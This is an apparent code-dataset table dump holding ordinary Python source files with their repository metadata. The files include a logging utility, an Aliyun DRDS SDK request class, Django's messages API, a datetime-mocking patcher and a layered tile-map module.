hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b621588455e5d76a0ba73fb71140693684704279 | 9,532 | py | Python | nseta/common/log.py | webclinic017/nseta | e718c4cf05937456ea10fdd7a911d76ffbc51a2e | [
"MIT"
] | 1 | 2021-09-24T16:15:57.000Z | 2021-09-24T16:15:57.000Z | nseta/common/log.py | webclinic017/nseta | e718c4cf05937456ea10fdd7a911d76ffbc51a2e | [
"MIT"
] | null | null | null | nseta/common/log.py | webclinic017/nseta | e718c4cf05937456ea10fdd7a911d76ffbc51a2e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import logging
import os
import sys
import time
import warnings
import inspect
from functools import wraps
# from inspect import getcallargs, getfullargspec
from collections import OrderedDict, Iterable
from itertools import *
__all__ = ['redForegroundText', 'greenForegroundText', 'line_break','clear_screen','set_cursor','setup_custom_logger', 'default_logger', 'log_to', 'tracelog', 'suppress_stdout_stderr']
__trace__ = False
__filter__ = None
__DEBUG__ = False
class colors:
'''Colors class:
Reset all colors with colors.reset
Two subclasses fg for foreground and bg for background.
Use as colors.subclass.colorname.
i.e. colors.fg.red or colors.bg.green
Also, the generic bold, disable, underline, reverse, strikethrough,
and invisible work with the main class
i.e. colors.bold
'''
reset='\033[0m'
bold='\033[01m'
disable='\033[02m'
underline='\033[04m'
reverse='\033[07m'
strikethrough='\033[09m'
invisible='\033[08m'
class fg:
black='\033[30m'
red='\033[31m'
green='\033[32m'
orange='\033[33m'
blue='\033[34m'
purple='\033[35m'
cyan='\033[36m'
lightgrey='\033[37m'
darkgrey='\033[90m'
lightred='\033[91m'
lightgreen='\033[92m'
yellow='\033[93m'
lightblue='\033[94m'
pink='\033[95m'
lightcyan='\033[96m'
class bg:
black='\033[40m'
red='\033[41m'
green='\033[42m'
orange='\033[43m'
blue='\033[44m'
purple='\033[45m'
cyan='\033[46m'
lightgrey='\033[47m'
class filterlogger:
def __init__(self, logger=None):
self._logger = logger
@property
def logger(self):
return self._logger
@property
def level(self):
return self.logger.level
@property
def isDebugging(self):
global __DEBUG__
return __DEBUG__
@level.setter
def level(self, level):
self.logger.setLevel(level)
@staticmethod
def getlogger(logger):
global __filter__
# if __filter__ is not None:
return filterlogger(logger=logger)
# else:
# return logger
def debug(self, e, exc_info=False):
global __filter__
line = str(e)
global __DEBUG__
if __DEBUG__:
frame = inspect.stack()[1]
filename = (frame[0].f_code.co_filename).rsplit('/', 1)[1]
components = str(frame).split(',')
line = '{} - {} - {}\n{}'.format(filename, components[5],components[6] , line)
if __filter__ is None:
self.logger.debug(line, exc_info=exc_info)
return
if __filter__ in line.upper():
self.logger.debug(line, exc_info=exc_info)
def info(self, line):
global __filter__
if __filter__ is None:
self.logger.info(line)
return
if __filter__ in line.upper():
self.logger.info(line)
def warn(self, line):
global __filter__
if __filter__ is None:
self.logger.warn(line)
return
if __filter__ in line.upper():
self.logger.warn(line)
def error(self, line):
self.logger.error(line)
def setLevel(self, level):
self.logger.setLevel(level)
def critical(self, line):
self.logger.critical(line)
def addHandler(self, hdl):
self.logger.addHandler(hdl)
def removeHandler(self, hdl):
self.logger.removeHandler(hdl)
def setup_custom_logger(name, levelname=logging.DEBUG, trace=False, log_file_path='logs.log', filter=None):
trace_formatter = logging.Formatter(fmt='\n%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(module)s - %(funcName)s - %(lineno)d\n%(message)s\n')
console_info_formatter = logging.Formatter(fmt='\n%(levelname)s - %(filename)s(%(funcName)s - %(lineno)d)\n%(message)s\n')
global __trace__
__trace__ = trace
global __filter__
__filter__ = filter if filter is None else filter.upper()
logger = logging.getLogger(name)
logger.setLevel(levelname)
consolehandler = logging.StreamHandler()
consolehandler.setFormatter(console_info_formatter if levelname == logging.INFO else trace_formatter)
consolehandler.setLevel(levelname)
logger.addHandler(consolehandler)
if levelname == logging.DEBUG:
filehandler = logging.FileHandler(log_file_path)
filehandler.setFormatter(trace_formatter)
filehandler.setLevel(levelname)
logger.addHandler(filehandler)
global __DEBUG__
__DEBUG__ = True
logger.debug('Logging started. Filter:{}'.format(filter))
if trace:
tracelogger = logging.getLogger('nseta_file_logger')
tracelogger.setLevel(levelname)
tracelogger.addHandler(consolehandler)
if levelname == logging.DEBUG:
tracelogger.addHandler(filehandler)
logger.debug('Tracing started')
# Turn off pystan warnings
warnings.simplefilter("ignore", DeprecationWarning)
warnings.simplefilter("ignore", FutureWarning)
return logger
def default_logger():
return filterlogger.getlogger(logging.getLogger('nseta'))
def file_logger():
return filterlogger.getlogger(logging.getLogger('nseta_file_logger'))
def trace_log(line):
global __trace__
if __trace__:
default_logger().info(line)
else:
file_logger().info(line)
def flatten(l):
"""Flatten a list (or other iterable) recursively"""
for el in l:
if isinstance(el, Iterable) and not isinstance(el, str):
for sub in flatten(el):
yield sub
else:
yield el
def getargnames(func):
"""Return an iterator over all arg names, including nested arg names and varargs.
Goes in the order of the functions argspec, with varargs and
keyword args last if present."""
(args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, annotations) = inspect.getfullargspec(func)
return chain(flatten(args), filter(None, [varargs, varkw]))
def getcallargs_ordered(func, *args, **kwargs):
"""Return an OrderedDict of all arguments to a function.
Items are ordered by the function's argspec."""
argdict = inspect.getcallargs(func, *args, **kwargs)
return OrderedDict((name, argdict[name]) for name in getargnames(func))
def describe_call(func, *args, **kwargs):
yield "Calling %s with args:" % func.__name__
for argname, argvalue in getcallargs_ordered(func, *args, **kwargs).items():
yield "\t%s = %s" % (argname, repr(argvalue))
def log_to(logger_func):
"""A decorator to log every call to function (function name and arg values).
logger_func should be a function that accepts a string and logs it
somewhere. The default is logging.debug.
If logger_func is None, then the resulting decorator does nothing.
This is much more efficient than providing a no-op logger
function: @log_to(lambda x: None).
"""
if logger_func is not None:
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
global __DEBUG__
if __DEBUG__:
frame = inspect.stack()[1]
filename = (frame[0].f_code.co_filename).rsplit('/', 1)[1]
components = str(frame).split(',')
func_description = '{} - {} - {}'.format(filename, components[5],components[6])
description = func_description
for line in describe_call(func, *args, **kwargs):
description = description + '\n' + line
logger_func(description)
startTime = time.time()
ret_val = func(*args, **kwargs)
time_spent = time.time() - startTime
logger_func('\n%s called (%s): %.3f (TIME_TAKEN)' % (func_description, func.__name__, time_spent))
return ret_val
else:
return func(*args, **kwargs)
return wrapper
else:
decorator = lambda x: x
return decorator
tracelog = log_to(trace_log)
# def timeit(method):
# def timed(*args, **kw):
# ts = time.time()
# result = method(*args, **kw)
# te = time.time()
# if 'log_time' in kw:
# name = kw.get('log_name', method.__name__.upper())
# kw['log_time'][name] = int((te - ts) * 1000)
# else:
# print ('%r %2.2f ms' % \
# (method.__name__, (te - ts) * 1000))
# return result
# return timed
class suppress_stdout_stderr(object):
'''
A context manager for doing a "deep suppression" of stdout and stderr in
Python, i.e. will suppress all print, even if the print originates in a
compiled C/Fortran sub-function.
This will not suppress raised exceptions, since exceptions are printed
to stderr just before a script exits, and after the context manager has
exited (at least, I think that is why it lets exceptions through).
'''
def __init__(self):
# Open a pair of null files
self.null_fds = [os.open(os.devnull, os.O_RDWR) for x in range(2)]
# Save the actual stdout (1) and stderr (2) file descriptors.
self.save_fds = [os.dup(1), os.dup(2)]
def __enter__(self):
# Assign the null pointers to stdout and stderr.
os.dup2(self.null_fds[0], 1)
os.dup2(self.null_fds[1], 2)
def __exit__(self, *_):
# Re-assign the real stdout/stderr back to (1) and (2)
os.dup2(self.save_fds[0], 1)
os.dup2(self.save_fds[1], 2)
# Close the null files
for fd in self.null_fds + self.save_fds:
os.close(fd)
def line_break(): print("-"*25)
def clear_screen(): os.system('clear' if os.name =='posix' else 'cls')
def set_cursor(): sys.stdout.write('\033[F')
def redForegroundText(text): print('\n'+ colors.fg.red + text + colors.reset)
def greenForegroundText(text): print('\n' + colors.fg.green + text + colors.reset)
| 31.150327 | 184 | 0.661771 |
e3db15d16bca89ff525584f8b8074451dfed98bc | 935 | py | Python | classify_folder.py | chandan2495/hackathon2016 | 0b7dfc9ce713ad98a878f69f2d167057682fde4b | [
"MIT"
] | 1 | 2020-06-30T17:47:44.000Z | 2020-06-30T17:47:44.000Z | classify_folder.py | chandan2495/hackathon2016 | 0b7dfc9ce713ad98a878f69f2d167057682fde4b | [
"MIT"
] | null | null | null | classify_folder.py | chandan2495/hackathon2016 | 0b7dfc9ce713ad98a878f69f2d167057682fde4b | [
"MIT"
] | 4 | 2017-05-12T08:30:29.000Z | 2020-10-28T01:22:13.000Z | from test_imagenet import classify_image
import os
import sys
sys.path.insert(0, 'Scrapbook/python_scripts')
import superclass as sc
image_extensions = ["jpg", "jpeg", "png", "bmp"]
album_superclass_map = {
'animal' : 'Animal',
'person' : 'Person',
'location' : 'Places',
'vehicle' : 'Vehicles',
'sport' : 'Sports',
'geological_formation' : 'Outdoor',
'musical_instrument' : 'Musical Instruments',
'plant' : 'Nature',
'electronic_equipment' : 'Electronic Gadgets',
'misc' : 'Miscellaneous',
}
def classify_folder(dirpath):
for image in os.listdir(dirpath):
if image.split(".")[-1] in image_extensions:
print image
top_pred, out_label_preds= classify_image(dirpath + "\\"+ image)
print 'Image : {} , Label : {}'.format(image,top_pred['label'][1])
print 'Superclass : ', sc.getSuperClass(top_pred['label'][1])
classify_folder('G:\Hackathon\deep-learning-models\images\\awsome') | 31.166667 | 70 | 0.675936 |
70fcdb0aa6074134073e1e94115d181f397bd394 | 1,967 | py | Python | aliyun-python-sdk-drds/aliyunsdkdrds/request/v20171016/ModifyRdsReadWeightRequest.py | liuzheng/aliyun-openapi-python-sdk | 1ba6743f3d6f2cef57ec9e3be1754b04293c3150 | [
"Apache-2.0"
] | 1 | 2021-03-08T02:59:17.000Z | 2021-03-08T02:59:17.000Z | aliyun-python-sdk-drds/aliyunsdkdrds/request/v20171016/ModifyRdsReadWeightRequest.py | bricklayer-Liu/aliyun-openapi-python-sdk | 20da2554de22679fc7c5462c483663e4d79512aa | [
"Apache-2.0"
] | null | null | null | aliyun-python-sdk-drds/aliyunsdkdrds/request/v20171016/ModifyRdsReadWeightRequest.py | bricklayer-Liu/aliyun-openapi-python-sdk | 20da2554de22679fc7c5462c483663e4d79512aa | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdrds.endpoint import endpoint_data
class ModifyRdsReadWeightRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Drds', '2017-10-16', 'ModifyRdsReadWeight','Drds')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_Weights(self):
return self.get_query_params().get('Weights')
def set_Weights(self,Weights):
self.add_query_param('Weights',Weights)
def get_DrdsInstanceId(self):
return self.get_query_params().get('DrdsInstanceId')
def set_DrdsInstanceId(self,DrdsInstanceId):
self.add_query_param('DrdsInstanceId',DrdsInstanceId)
def get_InstanceNames(self):
return self.get_query_params().get('InstanceNames')
def set_InstanceNames(self,InstanceNames):
self.add_query_param('InstanceNames',InstanceNames)
def get_DbName(self):
return self.get_query_params().get('DbName')
def set_DbName(self,DbName):
self.add_query_param('DbName',DbName) | 35.125 | 80 | 0.766141 |
2566d71238257b6a248ca6c6388a66f21e1ac38e | 3,091 | py | Python | django/contrib/messages/api.py | MikeAmy/django | 00cb9e13b4cf06ed2be27ee9e7fc18969ae69f7d | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2017-08-30T06:46:16.000Z | 2017-08-30T06:46:16.000Z | django/contrib/messages/api.py | MikeAmy/django | 00cb9e13b4cf06ed2be27ee9e7fc18969ae69f7d | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/contrib/messages/api.py | MikeAmy/django | 00cb9e13b4cf06ed2be27ee9e7fc18969ae69f7d | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2018-07-23T12:13:04.000Z | 2018-07-23T12:13:04.000Z | from django.contrib.messages import constants
from django.contrib.messages.storage import default_storage
from django.http import HttpRequest
__all__ = (
'add_message', 'get_messages',
'get_level', 'set_level',
'debug', 'info', 'success', 'warning', 'error',
'MessageFailure',
)
class MessageFailure(Exception):
pass
def add_message(request, level, message, extra_tags='', fail_silently=False):
"""
Attempts to add a message to the request using the 'messages' app.
"""
if not isinstance(request, HttpRequest):
raise TypeError("add_message() argument must be an HttpRequest object, "
"not '%s'." % request.__class__.__name__)
if hasattr(request, '_messages'):
return request._messages.add(level, message, extra_tags)
if not fail_silently:
raise MessageFailure('You cannot add messages without installing '
'django.contrib.messages.middleware.MessageMiddleware')
def get_messages(request):
"""
Returns the message storage on the request if it exists, otherwise returns
an empty list.
"""
return getattr(request, '_messages', [])
def get_level(request):
"""
Returns the minimum level of messages to be recorded.
The default level is the ``MESSAGE_LEVEL`` setting. If this is not found,
the ``INFO`` level is used.
"""
storage = getattr(request, '_messages', default_storage(request))
return storage.level
def set_level(request, level):
"""
Sets the minimum level of messages to be recorded, returning ``True`` if
the level was recorded successfully.
If set to ``None``, the default level will be used (see the ``get_level``
method).
"""
if not hasattr(request, '_messages'):
return False
request._messages.level = level
return True
def debug(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``DEBUG`` level.
"""
add_message(request, constants.DEBUG, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def info(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``INFO`` level.
"""
add_message(request, constants.INFO, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def success(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``SUCCESS`` level.
"""
add_message(request, constants.SUCCESS, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def warning(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``WARNING`` level.
"""
add_message(request, constants.WARNING, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def error(request, message, extra_tags='', fail_silently=False):
"""
Adds a message with the ``ERROR`` level.
"""
add_message(request, constants.ERROR, message, extra_tags=extra_tags,
fail_silently=fail_silently)
| 30.303922 | 80 | 0.671304 |
329d994b6b9046c508ed0f0e2fe03bf2c4677882 | 70 | py | Python | HackerRank Solutions/Python/Math/Integers Come In All Sizes.py | DevashishPathrabe/Competetive-Coding | 91049459359854b7834cbfb31415682600dc9c57 | [
"MIT"
] | null | null | null | HackerRank Solutions/Python/Math/Integers Come In All Sizes.py | DevashishPathrabe/Competetive-Coding | 91049459359854b7834cbfb31415682600dc9c57 | [
"MIT"
] | null | null | null | HackerRank Solutions/Python/Math/Integers Come In All Sizes.py | DevashishPathrabe/Competetive-Coding | 91049459359854b7834cbfb31415682600dc9c57 | [
"MIT"
] | null | null | null | a,b,c,d = (int(input())
for _ in range(4))
print (pow(a,b)+pow(c,d))
| 17.5 | 25 | 0.557143 |
c747b46ab44ae3c928fff206bff2ae841f39a6b3 | 48 | py | Python | main_3.py | JeonghyunKo/second_project | 4c6074c8aeb226cbb2e0f8dce8b6163c35948b70 | [
"MIT"
] | null | null | null | main_3.py | JeonghyunKo/second_project | 4c6074c8aeb226cbb2e0f8dce8b6163c35948b70 | [
"MIT"
] | null | null | null | main_3.py | JeonghyunKo/second_project | 4c6074c8aeb226cbb2e0f8dce8b6163c35948b70 | [
"MIT"
] | null | null | null | print("user 1")
print("user 2")
print("user 3")
| 12 | 15 | 0.625 |
387856b7a4490524f1bb322b4a429821bb6ba9ac | 4,881 | py | Python | src/time_travel/patchers/datetime_patcher.py | meircif/time-travel | 99044a01d3cfb4ea4950432c2f044683ff3ece40 | [
"MIT"
] | 38 | 2017-08-01T07:57:40.000Z | 2021-11-17T04:55:29.000Z | src/time_travel/patchers/datetime_patcher.py | meircif/time-travel | 99044a01d3cfb4ea4950432c2f044683ff3ece40 | [
"MIT"
] | 32 | 2017-07-09T18:46:07.000Z | 2020-07-30T06:31:40.000Z | src/time_travel/patchers/datetime_patcher.py | meircif/time-travel | 99044a01d3cfb4ea4950432c2f044683ff3ece40 | [
"MIT"
] | 7 | 2017-07-22T07:44:29.000Z | 2020-07-28T14:13:13.000Z | """A patch to the datetime module."""
from .base_patcher import BasePatcher
import sys
import datetime
try:
import copy_reg as copyreg
except ImportError:
import copyreg
_real_datetime = datetime.datetime
_real_date = datetime.date
def with_metaclass(meta, name, *bases):
"""Create a base class with a metaclass."""
return meta(name, bases, {})
class DateSubclassMeta(type):
"""Date mock metaclass to check instancechek to the real class."""
@classmethod
def __instancecheck__(mcs, obj):
return isinstance(obj, _real_date)
class DatetimeSubclassMeta(DateSubclassMeta):
"""Datetime mock metaclass to check instancechek to the real class."""
@classmethod
def __instancecheck__(mcs, obj):
return isinstance(obj, _real_datetime)
def date_to_fakedate(date):
"""Return mocked datetime object from original one."""
return FakeDate(date.year,
date.month,
date.day)
def datetime_to_fakedatetime(datetime):
"""Return mocked datetime object from original one."""
return FakeDatetime(datetime.year,
datetime.month,
datetime.day,
datetime.hour,
datetime.minute,
datetime.second,
datetime.microsecond,
datetime.tzinfo)
class FakeDate(with_metaclass(DateSubclassMeta, 'date', _real_date)):
"""Mocked datetime.date class."""
def __new__(cls, *args, **kwargs):
"""Return a new mocked date object."""
return _real_date.__new__(cls, *args, **kwargs)
@classmethod
def today(cls):
"""Return today's date."""
result = cls._now()
return date_to_fakedate(result)
FakeDate.min = date_to_fakedate(_real_date.min)
FakeDate.max = date_to_fakedate(_real_date.max)
class FakeDatetime(with_metaclass(DatetimeSubclassMeta, 'datetime',
_real_datetime, FakeDate)):
"""Mocked datetime.datetime class."""
def __new__(cls, *args, **kwargs):
"""Return a new mocked datetime object."""
return _real_datetime.__new__(cls, *args, **kwargs)
@classmethod
def now(cls, tz=None):
"""Return a datetime object representing current time."""
now = cls._now()
if tz:
result = tz.fromutc(now.replace(tzinfo=tz)) +\
datetime.timedelta(hours=cls._tz_offset())
else:
result = now
return datetime_to_fakedatetime(result)
@classmethod
def today(cls):
"""Return a datetime object representing current time."""
return cls.now(tz=None)
@classmethod
def utcnow(cls):
"""Return a datetime object representing current time."""
result = cls._now()
return datetime_to_fakedatetime(result)
FakeDatetime.min = datetime_to_fakedatetime(_real_datetime.min)
FakeDatetime.max = datetime_to_fakedatetime(_real_datetime.max)
def pickle_fake_date(datetime_):
"""Pickle function for FakeDate."""
return FakeDate, (
datetime_.year,
datetime_.month,
datetime_.day,
)
def pickle_fake_datetime(datetime_):
"""Pickle function for FakeDatetime."""
return FakeDatetime, (
datetime_.year,
datetime_.month,
datetime_.day,
datetime_.hour,
datetime_.minute,
datetime_.second,
datetime_.microsecond,
datetime_.tzinfo,
)
class DatetimePatcher(BasePatcher):
"""Patcher of the datetime module.
patching:
- datetime.today
- datetime.now
- datetime.utcnow
- date.today
"""
def __init__(self, **kwargs):
"""Create the patcher."""
super(DatetimePatcher, self).__init__(patcher_module=__name__,
**kwargs)
FakeDate._now = self._now
FakeDatetime._now = self._now
def get_patched_module(self):
"""Return the actual module obect to be patched."""
return datetime
def get_patch_actions(self):
"""Return list of the patches to do."""
return [
('date', _real_date, FakeDate),
('datetime', _real_datetime, FakeDatetime)
]
def start(self):
"""Change pickle function for datetime to handle mocked datetime."""
super(DatetimePatcher, self).start()
copyreg.dispatch_table[_real_datetime] = pickle_fake_datetime
copyreg.dispatch_table[_real_date] = pickle_fake_date
def stop(self):
"""Return pickle behavior to normal."""
copyreg.dispatch_table.pop(_real_datetime)
copyreg.dispatch_table.pop(_real_date)
super(DatetimePatcher, self).stop()
def _now(self):
return _real_datetime.fromtimestamp(self.clock.time)
| 27.268156 | 76 | 0.625282 |
97b14b8948d01a780558bcaf02220cee031de9a3 | 11,207 | py | Python | layeredmap.py | Xitog/teddy | aaa192bb254d2d76b00d0b869a56dd7d92c9208a | [
"MIT"
] | null | null | null | layeredmap.py | Xitog/teddy | aaa192bb254d2d76b00d0b869a56dd7d92c9208a | [
"MIT"
] | null | null | null | layeredmap.py | Xitog/teddy | aaa192bb254d2d76b00d0b869a56dd7d92c9208a | [
"MIT"
] | null | null | null | """A map with different layers."""
import json
from traceback import print_exc
from sys import stdout
def pretty_json(data, level=0, indent=4):
"Pretty print some JSON."
content = ''
if isinstance(data, dict):
content += '{\n'
level += 1
count = 0
for key, val in data.items():
content += ' ' * indent * level + '"' + str(key) + '": '
content += pretty_json(val, level, indent)
count += 1
if count == len(data):
level -= 1
content += '\n'
content += ' ' * indent * level + '}'
else:
content += ',\n'
if len(data) == 0:
level -= 1
content += ' ' * indent * level + '}'
elif isinstance(data, list):
list_in_list = False
for val in data:
if isinstance(val, list):
list_in_list = True
break
content += '['
level += 1
count = 0
if list_in_list:
content += '\n'
for val in data:
if list_in_list:
content += ' ' * indent * level
content += pretty_json(val, level)
count += 1
if count == len(data):
level -= 1
if list_in_list:
content += '\n' + ' ' * indent * level
content += ']'
else:
content += ', '
if list_in_list:
content += '\n'
if len(data) == 0:
level -= 1
content += ' ' * indent * level + ']'
elif isinstance(data, str):
content += '"' + data + '"'
elif isinstance(data, bool):
content += "true" if data else "false"
elif isinstance(data, int):
content += str(data)
elif isinstance(data, float):
content += str(data)
else:
raise Exception('Type unknown: ' + data.__class__.__name__)
return content
class Obj:
def __init__(self, name, attributes):
self.name = name
self.attr = attributes
def __str__(self):
return f"<Obj {self.name}>"
class Layer:
"A class representing a layer of the map."
@staticmethod
def create_matrix(max_col: int, max_row: int, default: int = 0):
"Static method for creating a matrix, a list of rows."
matrix = []
for _ in range(max_row):
row = []
for _ in range(max_col):
row.append(default)
matrix.append(row)
return matrix
def __init__(self, mymap: str, name: str, default: int, obj : Obj = None):
self.map = mymap
self.name = name
self.default = default
self.content = Layer.create_matrix(self.map.width,
self.map.height,
default)
self.prototype = obj
self.objects = []
def is_object_layer(self):
"This layer is an object layer."
return self.prototype is not None
def resize(self):
"Resize a layer."
old = self.content
self.content = Layer.create_matrix(self.map.width,
self.map.height,
self.default)
for row in range(min(len(old), self.map.height)):
for col in range(min(len(old[0]), self.map.width)):
self.content[row][col] = old[row][col]
def get(self, row: int, col: int):
"Return int at row, col."
return self.content[row][col]
def set(self, val, row: int, col: int):
"Set val at row, col. val can be int or dict"
prev = self.content[row][col]
if not isinstance(prev, int):
self.objects.remove(prev)
self.content[row][col] = val
if not isinstance(val, int):
self.objects.append(val)
return {'name': self.name, 'row': row, 'col': col,
'prev': prev, 'next': val}
def to_json(self):
"Return a JSON representation of the layer."
res = {
"default": self.default
}
if self.is_object_layer():
res['object'] = self.prototype.name
res['content'] = self.objects
else:
res['content'] = self.content
return res
class Map:
"A class representing a map/level/floor."
@staticmethod
def get_mod(filepath):
"Get the mod of a map from a JSON file."
file = open(filepath, mode='r', encoding='utf8')
data = json.load(file)
file.close()
return data['mod']
@staticmethod
def from_json(app, filepath):
"Load a map from a JSON file."
file = open(filepath, mode='r', encoding='utf8')
data = json.load(file)
file.close()
a_map = Map(app, data["name"], data["width"], data["height"])
for name, lay in data["layers"].items():
obj = None
if 'object' in lay:
obj = app.mod.layers[name].obj
a_map.add_layer(name, lay["default"], obj)
if 'object' in lay:
# populate with the objects
for obj in lay['content']:
a_map.layers[name].content[obj['y']][obj['x']] = obj
a_map.layers[name].objects.append(obj)
else:
# replace with the content saved
a_map.layers[name].content = lay["content"]
a_map.filepath = filepath
a_map.modcode = data["mod"]
return a_map
def __init__(self, app, name: str, max_col: int, max_row: int):
self.app = app
self.modcode = app.mod.code if app is not None and \
app.mod is not None else 'undefined'
self.name = name
self.layers = {}
self.width = max_col
self.height = max_row
self.filepath = None
def resize(self, width, height):
"Resize a map and all its layers."
self.width = width
self.height = height
for _, lay in self.layers.items():
lay.resize()
def info(self):
"Display info on the map."
print(repr(self))
if len(self.layers) == 0:
print('No layer in map')
return
for name, lay in self.layers.items():
print('<' + name + '>')
if lay.object is not None:
print(" type =", lay.object)
print(" ido =", lay.ido)
print(' ', end='')
print(*lay.content, sep='\n ')
if lay.object is not None:
for key, value in lay.objects.items():
print(f"{key:5d} : {value}")
def add_layer(self, name, default: int = 0, obj: str = None):
"Add a layer to a map."
if not isinstance(default, int):
msg = f'[ERROR] Only integer value not {default.__class__.__name__}'
raise Exception(msg)
if name in self.layers:
msg = f'[ERROR] Layer {name} already exists.'
raise Exception(msg)
self.layers[name] = Layer(self, name, default, obj)
def has_objects(self, name):
"The layer name is an object layer."
return self.layers[name].is_object_layer()
def check(self, row, col, layer=None):
"Check row, col and layer if not None."
if layer is not None and layer not in self.layers:
return False
#raise Exception(f"[ERROR] Layer {layer} not defined.")
if not 0 <= row < self.height:
return False
#raise Exception(f"[ERROR] Out of row: {row} / {self.height}")
if not 0 <= col < self.width:
return False
#raise Exception(f"[ERROR] Out of col: {col} / {self.width}")
return True
def get(self, row, col, layer=None):
"Get value at row, col in layer."
self.check(row, col, layer)
if layer is not None:
return self.layers[layer].get(row, col)
res = {}
for _, lay in self.layers.items():
res[lay.name] = lay.get(row, col)
return res
def set(self, val, row, col, layer):
"Set value at row, col in layer."
self.check(row, col, layer)
return self.layers[layer].set(val, row, col)
def set_name(self, name):
"Set the name of the map."
self.name = name
def __repr__(self):
mod_name = self.app.mod.code if self.app is not None and \
self.app.mod is not None else ''
return f"{self.name} {self.width}x{self.height}" + \
f"[{len(self.layers)}]{mod_name}"
def to_json(self):
"Return a JSON representation of the map."
data = {
"name": self.name,
"width": self.width,
"height": self.height
}
data["mod"] = self.app.mod.code if self.app is not None and \
self.app.mod is not None else ''
data["layers"] = {}
for _, lay in self.layers.items():
data["layers"][lay.name] = lay.to_json()
return data
def save(self, filepath):
"Save to a file."
file = open(filepath, mode='w', encoding='utf8')
file.write(pretty_json(self.to_json()))
file.close()
try:
file = open(filepath, mode='r', encoding='utf8')
json.load(file)
file.close()
except json.JSONDecodeError:
print('Something went wrong when trying to load map. Map may be corrupted.')
print('Stack info:')
print_exc(file=stdout)
self.filepath = filepath
if __name__ == '__main__':
# Create matrix tests
L5X10 = Layer.create_matrix(5, 10)
print(*L5X10, sep='\n')
# Map and layer tests
A_MAP = Map(None, "A map", 4, 4)
A_MAP.info()
A_MAP.add_layer('ground', 0)
A_MAP.info()
A_MAP.set(5, 3, 3, 'ground')
A_MAP.info()
A_MAP.resize(7, 7)
A_MAP.info()
# Pretty json tests
A_DICT = {'a': 5, 'b': True, 'c': 3.14}
print("1:")
print(pretty_json(A_DICT))
A_LIST = [1, 2, 3, 4, 5]
print("2:")
print(pretty_json(A_LIST))
A_MIXED = [True, [1, 2, 3], "hello"]
print("3:")
print(pretty_json(A_MIXED))
A_MATRIX = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
print("4:")
print(pretty_json(A_MATRIX))
A_COMBINED = {
"layers": {
"ground": [
[1, 1, 1],
[2, 2, 2],
[3, 3, 3]
]
}
}
print(pretty_json(A_COMBINED))
print("5:")
A_DICT_OF_DICT = {"dA1": {"dB1": 5}, "dA2": [1, 2, 3, "hello"], "dA3": True}
print(pretty_json(A_DICT_OF_DICT))
print("Final:")
print(pretty_json(A_MAP.to_json()))
A_MAP.save("saved.map")
A_NEW_MAP = Map.from_json(None, "saved.map")
A_NEW_MAP.save("saved2.map")
print("With Unit:")
Unit = {'name': 'Content_Name', 'player': 'Meta_Player'}
A_MAP.add_layer('unit', 0, Unit)
A_MAP.set({"name": "kbot", "player": 1, "val": 28}, 3, 3, "unit")
A_MAP.info()
| 32.484058 | 88 | 0.510841 |
626190e0710277b6b898735fae9929f288d8a1e1 | 699 | py | Python | ruddock/routes.py | calebsander/RuddockWebsite | e6497bfdecffdfb712c36085fa1df93d08380dd2 | [
"MIT"
] | 7 | 2015-01-31T20:07:23.000Z | 2020-04-11T16:36:08.000Z | ruddock/routes.py | calebsander/RuddockWebsite | e6497bfdecffdfb712c36085fa1df93d08380dd2 | [
"MIT"
